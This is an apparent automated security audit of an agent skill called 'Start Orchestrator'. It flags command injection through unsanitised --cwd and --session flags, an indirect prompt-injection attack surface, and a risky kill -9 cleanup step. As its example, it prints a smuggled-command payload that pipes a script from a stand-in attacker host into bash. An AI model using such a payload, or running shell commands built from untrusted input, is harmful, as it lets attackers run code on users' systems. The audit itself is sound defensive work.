Start Orchestrator
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
- [COMMAND_EXECUTION] (HIGH): The skill instructs the agent to construct and execute shell commands that incorporate untrusted user input directly into CLI flags (`--cwd` and `--session`). An attacker could provide a malicious payload (e.g., `"/tmp; curl http://attacker.com/sh | bash"`) which, if interpolated without sanitization, would lead to arbitrary code execution.
- [INDIRECT_PROMPT_INJECTION] (MEDIUM): The skill provides an attack surface where external user-controlled data is used to influence system-level operations.
  - Ingestion points: User-provided paths and session IDs via the `--cwd` and `--session` flags.
  - Boundary markers: None present; the instructions do not include delimiters or instructions to treat these inputs as literal data.
  - Capability inventory: Full shell access, including directory changes (`cd`), script execution (`./start_be.sh`), and process management (`kill`).
  - Sanitization: No sanitization or validation logic is specified for the input variables.
- [COMMAND_EXECUTION] (LOW): The cleanup routine uses `lsof -ti:[port] | xargs kill -9`. While standard for development environments, this is a destructive operation that could terminate unintended processes if the user influences the port configuration.
Recommendations
- AI detected serious security threats
Audit Metadata